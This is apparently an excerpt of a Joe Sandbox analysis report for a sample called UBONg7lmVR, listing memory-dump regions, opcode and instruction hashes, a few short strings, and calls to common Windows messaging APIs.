                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DispatchMessage
                                                  • String ID:
                                                  • API String ID: 2061451462-0
                                                  • Opcode ID: 53628c463e93469ad80d6e1eabf48612e8fd1bcf40216dfead6b101295be510b
                                                  • Instruction ID: e01fc57c5e98d48535dc1cd223c17f941c7c72ee4ff5afd0a1580feeb4ff855d
                                                  • Opcode Fuzzy Hash: 53628c463e93469ad80d6e1eabf48612e8fd1bcf40216dfead6b101295be510b
                                                  • Instruction Fuzzy Hash: 9311E0B9C046489FDB10DF9AD884BDEBBF4EB48310F10846AE919A7200D378A945CFA5
                                                  APIs
                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,154186EF), ref: 15419185
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DispatchMessage
                                                  • String ID:
                                                  • API String ID: 2061451462-0
                                                  • Opcode ID: 00c8f641dad4d99fa2d186c6ca602e17c475968d263a876e1951f13a3881db6b
                                                  • Instruction ID: 5a17e42aac0970155bb0105875772f38019dc0d2a0d4e8af5a5713813767a52b
                                                  • Opcode Fuzzy Hash: 00c8f641dad4d99fa2d186c6ca602e17c475968d263a876e1951f13a3881db6b
                                                  • Instruction Fuzzy Hash: 711122B9C04659CFDB10CF9AD484BDEBBF4EB48314F10845ED419A7610C378A544CFA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (p
                                                  • API String ID: 0-4175582459
                                                  • Opcode ID: e971b817d569d04db635c923476e2549f951d715d95d47dd461f5f206c09757b
                                                  • Instruction ID: 6e26f3247690734556fe0d17b89743b0ebd3717e9f3a5707e6c5bbbb0de39b9c
                                                  • Opcode Fuzzy Hash: e971b817d569d04db635c923476e2549f951d715d95d47dd461f5f206c09757b
                                                  • Instruction Fuzzy Hash: CF91EE70A05208DFCB18DFA9D8546AEFFF6EF85310F14886EE446A7350CB349855CBA1
                                                  APIs
                                                  • SetWindowLongW.USER32(?,?,?), ref: 099B2E55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: LongWindow
                                                  • String ID:
                                                  • API String ID: 1378638983-0
                                                  • Opcode ID: 5a49a8c45a517cef288e0ca7c6a4d0d666edb17c44c3e4e94e6101760803d3f3
                                                  • Instruction ID: ad02d7466c4cb5548cc70a57825f640e8f25f3f617d56dc4faad4020f3602e21
                                                  • Opcode Fuzzy Hash: 5a49a8c45a517cef288e0ca7c6a4d0d666edb17c44c3e4e94e6101760803d3f3
                                                  • Instruction Fuzzy Hash: 9C1118B58002498FDB10CF9AC545BDEFBF8EB48310F20841AD914B7300C374A944CFA5
                                                  APIs
                                                  • SendMessageW.USER32(?,?,?,?), ref: 07D2CC75
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 407b733c2a10a171e7d1a059f68ec026afa15cd6821c8eee9802c369524fbd18
                                                  • Instruction ID: 24df37b82df3c8cd83fad8d9e98ea83a8170019f44fc77b1d21a7f4188b61ea0
                                                  • Opcode Fuzzy Hash: 407b733c2a10a171e7d1a059f68ec026afa15cd6821c8eee9802c369524fbd18
                                                  • Instruction Fuzzy Hash: 9B11E5B58003599FDB20CF9AC945BDEFBF8EB48314F20885AD518A7710C375A945CFA5
                                                  APIs
                                                  • PostMessageW.USER32(?,?,?,?), ref: 07D2F6E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: d4c4ba3cb7f15e9469bd167d7bc348d840ebe545301d5456bf59af6fb78138fa
                                                  • Instruction ID: 337e93f412ef05e7916690ac35a71e4e353b7ec1af442bf581dece1dd0c09040
                                                  • Opcode Fuzzy Hash: d4c4ba3cb7f15e9469bd167d7bc348d840ebe545301d5456bf59af6fb78138fa
                                                  • Instruction Fuzzy Hash: 19F0E5B28043578EE720CF59C4453EDFBF0EB14329F24885AC16893662C339958BDB55
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Tep
                                                  • API String ID: 0-914316021
                                                  • Opcode ID: bb715e8ddba62f6efca407baa443b173d6aaa467045ef7c84581216a03f2d1d1
                                                  • Instruction ID: 18cd8d13c0ecd24baf6d9521952dc76804eda514a8512ccc480522a56883baee
                                                  • Opcode Fuzzy Hash: bb715e8ddba62f6efca407baa443b173d6aaa467045ef7c84581216a03f2d1d1
                                                  • Instruction Fuzzy Hash: E451E171B012468FCB10EBB9DC949BEBBF6EFC43207188969E519DB391DB309C0587A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Hp
                                                  • API String ID: 0-671740992
                                                  • Opcode ID: f1930530773f54cc856c396c5bcbb32cfec0342874df19f32de2eaf5f0687cfb
                                                  • Instruction ID: 7a88b3e12f1fa260371fd3bf8c79de785fa9e0355d471bcb61d5474bfa4f141b
                                                  • Opcode Fuzzy Hash: f1930530773f54cc856c396c5bcbb32cfec0342874df19f32de2eaf5f0687cfb
                                                  • Instruction Fuzzy Hash: EC419F356002448FCB05DFA4C894AAD7BF6FF89300F5584A9E546EB362DB39ED05CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 6f1b7e850d103877f8ae5d39e1b9b8e9ba61eec84daa5d42aac7e6efb2ac01f3
                                                  • Instruction ID: 17f6054aaee4ca2ff0fe8989b07080b7add31ad2d90d9dc89a39e055ecfbbf35
                                                  • Opcode Fuzzy Hash: 6f1b7e850d103877f8ae5d39e1b9b8e9ba61eec84daa5d42aac7e6efb2ac01f3
                                                  • Instruction Fuzzy Hash: 39219571B04214CFCB15AB7884606BEBBE6EFC9200B1484BADA09CB355DA36CC45C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: bc41be88b8f9e276c417d42dc6f3bb541be8ddd00a5d8b17c6bd3a48fe0c9af0
                                                  • Instruction ID: 808e7e41f6e8526a47163911f6ad2313ea6a49a6f854bd66cc06848c34c03178
                                                  • Opcode Fuzzy Hash: bc41be88b8f9e276c417d42dc6f3bb541be8ddd00a5d8b17c6bd3a48fe0c9af0
                                                  • Instruction Fuzzy Hash: 7D21C271A04208CBCF25DF6884A06BEFBF5EF85300F14C07AE9499B645D632C941C795
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Hp
                                                  • API String ID: 0-671740992
                                                  • Opcode ID: ac7cada99e28c7080edfa6269810b845d08e14bd35efdbc998ecdd79329b9af8
                                                  • Instruction ID: dd7080c8166ebe05b5d8d3010da3df0489df4d2d1c552c8c7b0dc713d668fc43
                                                  • Opcode Fuzzy Hash: ac7cada99e28c7080edfa6269810b845d08e14bd35efdbc998ecdd79329b9af8
                                                  • Instruction Fuzzy Hash: 631102103193C01FC71B527908395B93FE68EC762031A40EBE285CF2B3C9484C06C3A3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Tep
                                                  • API String ID: 0-914316021
                                                  • Opcode ID: dbd4ac1348c4885e37224505bbd72f798b6e0e5f84897d273a4c1e701d0c07b8
                                                  • Instruction ID: 0c654ce57fec88ab424e7c05ac34494b9e70e8e431bad0636c0b90e1f50b7496
                                                  • Opcode Fuzzy Hash: dbd4ac1348c4885e37224505bbd72f798b6e0e5f84897d273a4c1e701d0c07b8
                                                  • Instruction Fuzzy Hash: 0E112171B002098BCB94EBB998216FEB7B6ABC9351B54456AC605E7344EB318D05CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ca2dc4c02233e94227b57569d020aa6f170805f5071561d6fbdafbfe1466cbdc
                                                  • Instruction ID: df295a08b9dc64c0ff19e6de5910909a5aefe68dc6a389d4b9538e4afac9b881
                                                  • Opcode Fuzzy Hash: ca2dc4c02233e94227b57569d020aa6f170805f5071561d6fbdafbfe1466cbdc
                                                  • Instruction Fuzzy Hash: 952290B0906B528BD7709FA4889839EFA94BB02714F30495FD2FBCA359C734D0868B46
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3ad8a51b3eface985c6c5ee0a055951a36c3ae038e48e4263cdbdabd1e37988
                                                  • Instruction ID: ee485063f6b443fc504178fe029d045e515cc7a3c4ed7818bbe7465d8bff16b7
                                                  • Opcode Fuzzy Hash: d3ad8a51b3eface985c6c5ee0a055951a36c3ae038e48e4263cdbdabd1e37988
                                                  • Instruction Fuzzy Hash: E4226CB0906F528BD7749FA4889839EF694BB05B08F30491FD2FBCA359D734D0869B46
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f190583d6085e651b83910d0575be239b1766014bc64a11b0f17a8d13b49067
                                                  • Instruction ID: 22b7777a60c650ccae794cda0d04fb747030030e68c26e419fb3e604b708fd4b
                                                  • Opcode Fuzzy Hash: 6f190583d6085e651b83910d0575be239b1766014bc64a11b0f17a8d13b49067
                                                  • Instruction Fuzzy Hash: 8481D235A10209DFCB04EFA4D8989EDFBB5FF89300F148569E506AB364EB31A945CF90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e9ca2ec8c99d28621ce1f51767aba2dc19ea8faf78fe5b3091811a2b230c5dae
                                                  • Instruction ID: 9bff5c7e92b244365ae61f462aa2de13450f8dbd611c4290384114730c6bf2cf
                                                  • Opcode Fuzzy Hash: e9ca2ec8c99d28621ce1f51767aba2dc19ea8faf78fe5b3091811a2b230c5dae
                                                  • Instruction Fuzzy Hash: BB71AF34E012098FCB04DFA8C8646ADFBF6FF88301F148169E64AA7390EB35D945CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99ccbebca41e1e757d782c714e409a9b1ad8869f86ace9086169e393c8e29b1c
                                                  • Instruction ID: d3b63a02f8331b94ab612cb04059b4ff3c15cec505cf84864a31622d54744b5c
                                                  • Opcode Fuzzy Hash: 99ccbebca41e1e757d782c714e409a9b1ad8869f86ace9086169e393c8e29b1c
                                                  • Instruction Fuzzy Hash: D4516D347002049FCB14EFA8C8A0B6AF7AAAF88700F144569E20ADB3B5DF75EC45CB51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1633c3559afc564f84730242a4b9e63634f6c66f2711a47e0fcd7c27a48fa0d8
                                                  • Instruction ID: 430ec9e585756e928aee3d13ad870e37226ba0a9f63f0c8dd2d11300fdf536f5
                                                  • Opcode Fuzzy Hash: 1633c3559afc564f84730242a4b9e63634f6c66f2711a47e0fcd7c27a48fa0d8
                                                  • Instruction Fuzzy Hash: 82614D35A00609DFDB04DFA9C854A9DBBF1FF88311F118159E909AB360DB71ED85CB80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c3c9d710f325098649ede64b758916cb9a8130cdbdf7f78987e787af79312c06
                                                  • Instruction ID: f82fdbe4c3f95a7e3dcc10a870aafc59281974e57b0b85fdf0c55a815e7bfccc
                                                  • Opcode Fuzzy Hash: c3c9d710f325098649ede64b758916cb9a8130cdbdf7f78987e787af79312c06
                                                  • Instruction Fuzzy Hash: 3D614935A006099FDB14DFA9C894B9DBBF2FF88310F218159E949AF360DB71AD85CB40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4ce8b4b690302ff080e90aadc2d26891de1449db08a1975f5d326783b8d70e69
                                                  • Instruction ID: eab906f66e0d0f020ac6e58f9fdf87a9bd7fcf288e33a566a76a142aaf0a499d
                                                  • Opcode Fuzzy Hash: 4ce8b4b690302ff080e90aadc2d26891de1449db08a1975f5d326783b8d70e69
                                                  • Instruction Fuzzy Hash: AC517DB1E002499FCB10DFA9D854AAFFBF9EFC8310F14882AE555E3250DB749945CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 047d0316153aba6c3f3332547426bbef9912c4a22435e958b19f0e7f70935c63
                                                  • Instruction ID: 2316b8151fe2e05da0b1ecdebcc09fdef3471f8f768ca61214a0f41e9c8c14b0
                                                  • Opcode Fuzzy Hash: 047d0316153aba6c3f3332547426bbef9912c4a22435e958b19f0e7f70935c63
                                                  • Instruction Fuzzy Hash: 54416D347002059FCB14EFA8C9A0BAAF7B6AF88304F148569E609DB361DB75EC45CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 97caa57246f790492549b01ee78966f03eb953677cfb3d30ee4a292360b7c64c
                                                  • Instruction ID: 52302d868d19b8b58ca379a3d919ec509f326f5c311c8a1c1196b2f76775fad1
                                                  • Opcode Fuzzy Hash: 97caa57246f790492549b01ee78966f03eb953677cfb3d30ee4a292360b7c64c
                                                  • Instruction Fuzzy Hash: 83417935B142588FDB14DB69C8A4EADBBF9BF8A300F1940A9F645EB361CA31DC00CB51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b5a3bb983da6b2dc7089baf87f08bd95ef2bf2a160f4ac805a8a64da84708afc
                                                  • Instruction ID: 1cfeca9f1e5e769b9de11fb3fc19700f9adc70601bea41728359091344758585
                                                  • Opcode Fuzzy Hash: b5a3bb983da6b2dc7089baf87f08bd95ef2bf2a160f4ac805a8a64da84708afc
                                                  • Instruction Fuzzy Hash: BE412A75E006199ECF00CFA9E4846EEFBF5FF48315F14802AEA19E7210E7359A56CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0ea79f3932393aa1168cd143ae3bd2abc8a302b2a16dcbf8de13df4f405087cf
                                                  • Instruction ID: 4355a2f00daa726daaea7c542115e2e3e2531921b036be4bbca67684b89fbea0
                                                  • Opcode Fuzzy Hash: 0ea79f3932393aa1168cd143ae3bd2abc8a302b2a16dcbf8de13df4f405087cf
                                                  • Instruction Fuzzy Hash: C84179708053589FDB26CFA9C8987CEBFF0EF0A314F15409AD145AB251C7B95986CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 36f8ecbb7bbd363334d6e0fa23777b1cae9dd824b7ed1cf172f9869a720ee7b8
                                                  • Instruction ID: 2f1ca75422498b65a20529d5c558666342f511be6c119e8f98208bd6dfdce95c
                                                  • Opcode Fuzzy Hash: 36f8ecbb7bbd363334d6e0fa23777b1cae9dd824b7ed1cf172f9869a720ee7b8
                                                  • Instruction Fuzzy Hash: 02418F35D20609DFCB00EFA8D954AEDFBB5FF49301F108129E5497B250EB70AA98CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8dc22e69b840fd4ac188cefbf2545ab606dea1cfbc1637ee2379c0dd97cc2f12
                                                  • Instruction ID: 67176c34f4d5737262dcd4c652f10940872aecb48f9ac4142a1d1fd95f9a9c5c
                                                  • Opcode Fuzzy Hash: 8dc22e69b840fd4ac188cefbf2545ab606dea1cfbc1637ee2379c0dd97cc2f12
                                                  • Instruction Fuzzy Hash: A641E0B1D013088BDB24DFA9C984A9EFBB5BF48304F648029D518AB204D7756A86CF90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d0fdaa113f39c1a6d66dd8c79e6f48bca0a6b6c3685a117f95d0baad20726454
                                                  • Instruction ID: 0f59edb0d280bc65e7078f113905a0634cf5f1ee8f78e7a75de37bb4936e5220
                                                  • Opcode Fuzzy Hash: d0fdaa113f39c1a6d66dd8c79e6f48bca0a6b6c3685a117f95d0baad20726454
                                                  • Instruction Fuzzy Hash: 8141E1B1D01309CBDF24DFA9C984ADEFBB5BF48304F64802AD518AB214D7756A86CF90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fc6375ec31537a8d1214884d2870a42823b74418aa7c70f2ca1e173f78d7cd62
                                                  • Instruction ID: 6a1ecd0833cd54932cdcd03802dbd2db4826264374602cfa251ed595675a526b
                                                  • Opcode Fuzzy Hash: fc6375ec31537a8d1214884d2870a42823b74418aa7c70f2ca1e173f78d7cd62
                                                  • Instruction Fuzzy Hash: 56419EB0D10359DFDB24CF9AC894A9EFBB5FF88310F20812AE419AB254D7746845CF90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b0a3d2fd5e35dbd97b89b1a2188d5f690fb6f6a5ad862eec82e6f4000a54b1c6
                                                  • Instruction ID: ecfa2c4b52a70f29b3567d750f50ef2e27896cf1dafdc4d0fa3ee3e65e391c6b
                                                  • Opcode Fuzzy Hash: b0a3d2fd5e35dbd97b89b1a2188d5f690fb6f6a5ad862eec82e6f4000a54b1c6
                                                  • Instruction Fuzzy Hash: FA312371608208CBDB14DF6CC8A52AABB61FF91304F24C96DE5968B341E736D94AC791
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b9ea9317cc1849c6151db8be177b5aa1cd61b304c0474f31e0ef0e31e88e3709
                                                  • Instruction ID: 3a21594f03dfb5a373d5f2473bf6ca9b1e38112b2ed34e1c6d4c97fb99dabc42
                                                  • Opcode Fuzzy Hash: b9ea9317cc1849c6151db8be177b5aa1cd61b304c0474f31e0ef0e31e88e3709
                                                  • Instruction Fuzzy Hash: D4310171A08348CFDB25DF68C8A11AABF71FF95304B24C96DD196CB212D736C84AC751
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0952a258ff27c5152dd1df0be50fb3d3acc5e2c1b0b4a8185567e64c3ecb318a
                                                  • Instruction ID: 2010963b7492eae124da95390e94dad771c5b5d7e0d7c2638fdc33ecb1d26ea7
                                                  • Opcode Fuzzy Hash: 0952a258ff27c5152dd1df0be50fb3d3acc5e2c1b0b4a8185567e64c3ecb318a
                                                  • Instruction Fuzzy Hash: CE31E1757042008FE704DF68E895AABB7EAEBC8314F148579E649CB365EB34DC028B61
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6d0063aef5f7ccd96a480f608fbeb71b928dad3610b854ead40ff383b2452fd5
                                                  • Instruction ID: 77d35462378b0f40b58316d1d0acb77f2fe3a1a76fc8095ceac8592d6be4ed1b
                                                  • Opcode Fuzzy Hash: 6d0063aef5f7ccd96a480f608fbeb71b928dad3610b854ead40ff383b2452fd5
                                                  • Instruction Fuzzy Hash: B3310635A202199FCB04DFA8D8A4EACF7B5FF89710B5185A9EA15AB365C730E804CB50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4b34a5a4393dce2ca2a0bc1c571047b1155fa5c54285fa45249308237e8ee623
                                                  • Instruction ID: 20f02e8e320bbd11587bfe48b87fc012b49246ee6eae1e9c1dd10e8cd166ccc9
                                                  • Opcode Fuzzy Hash: 4b34a5a4393dce2ca2a0bc1c571047b1155fa5c54285fa45249308237e8ee623
                                                  • Instruction Fuzzy Hash: BB313C39A00209DFCB04DFA4C854AAEBBFAFF88701F148059EA0997361D736D951CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 955deb8ce1b8d24db201f55c46cbde29d84a942a221af3d43f0794c8ee62dc69
                                                  • Instruction ID: 6767b0ce212dee349f62ed425566b2500c289a25c249df0a417428cc94e3fe9d
                                                  • Opcode Fuzzy Hash: 955deb8ce1b8d24db201f55c46cbde29d84a942a221af3d43f0794c8ee62dc69
                                                  • Instruction Fuzzy Hash: 09312979A00219EFCB04DFA4C954ABEBBB6FF88701F148059FA09A7321D736D952CB51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513823664.00000000099F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99f0000_UBONg7lmVR.jbxd
                                                  Similarity
